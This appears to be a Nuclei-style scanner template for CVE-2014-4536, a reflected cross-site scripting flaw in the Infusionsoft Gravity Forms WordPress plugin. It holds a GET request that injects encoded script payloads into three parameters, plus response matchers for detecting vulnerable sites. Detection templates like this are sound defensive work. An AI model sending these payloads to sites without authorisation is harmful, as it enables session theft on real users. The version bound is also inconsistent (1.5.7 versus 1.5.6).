id: CVE-2014-4536 info: name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS author: daffainfo severity: medium reference: - https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f - https://nvd.nist.gov/vuln/detail/CVE-2014-4536 tags: cve,cve2014,wordpress,wp-plugin,xss classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 cve-id: CVE-2014-4536 cwe-id: CWE-79 description: "Multiple cross-site scripting (XSS) vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter." requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&" matchers-condition: and matchers: - type: word words: - '">' part: body - type: word part: header words: - text/html - type: status status: - 200